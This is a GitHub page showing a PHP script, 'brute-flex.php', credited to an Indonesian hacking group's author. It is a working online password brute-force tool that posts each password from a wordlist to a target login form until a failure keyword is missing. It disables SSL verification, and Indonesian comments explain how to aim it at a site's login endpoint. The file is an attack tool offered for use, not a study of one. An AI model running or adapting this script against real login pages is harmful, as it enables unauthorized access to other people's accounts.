-
Notifications
You must be signed in to change notification settings - Fork 1
Expand file tree
/
Copy pathbrute-flex.php
More file actions
68 lines (53 loc) · 2.13 KB
/
Copy pathbrute-flex.php
File metadata and controls
68 lines (53 loc) · 2.13 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
<?php
/*
by Tu5b0l3d
http://www.indoxploit.or.id/2016/06/tool-bruteforce-fleksibel.html
#################################################################################
Usage: php brute.php password.txt "username=admin&password=PASS::fail" url
PASS jangan diganti!
password.txt
password_1<br>password_2<br>password_3
fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login
ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah
url ganti jadi url action loginnya.
##################################################################################
example:
php brute.php Pass.txt "usernm=admin&pss=PASS::salah" http://site.com/login_act.php
*/
if(is_file($argv[1]) && $argv[2]!="" && $argv[3]!=""){
$list = $argv[1];
$post_name_before = $argv[2];
$url = $argv[3];
$get_list = file_get_contents("$list");
$cok = explode("<br>", $get_list);
$param_failed = explode("::", $post_name_before);
foreach($cok as $pass){
$post_name = str_replace("PASS", $pass, $param_failed[0]);
echo "\n$post_name\n";
$kirim = kirim($url, $post_name);
if(preg_match("/$param_failed[1]/i", $kirim)){
echo "$pass <= No\n\n";
}
else{
echo "$pass <====================== Yes\n\n";
break;
}
}
}
else{
echo "\n\nUsage: php $argv[0] password.txt \"username=admin&password=PASS:fail\" url\n# PASS jangan diganti\n\n# password.txt\npassword_1<br>password_2<br>password_3\n\n# fail adalah parameter yang menandakan gagal login, misalnya pas lu klik login ada tulisan password atau username salah, berarti fail lu bisa ganti jadi salah\n\n# url ganti jadi url action loginnya\n\nexample:\nphp brute.php Pass.txt \"usernm=admin&pss=PASS::salah\" http://site.com/login_act.php\n\n";
}
function kirim($url, $isi){
$ch = curl_init ("$url");
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt ($ch, CURLOPT_POST, 1);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "$isi");
curl_setopt($ch, CURLOPT_COOKIEJAR,'coker_log');
curl_setopt($ch, CURLOPT_COOKIEFILE,'coker_log');
$masuk = curl_exec ($ch);
return $masuk;
}
?>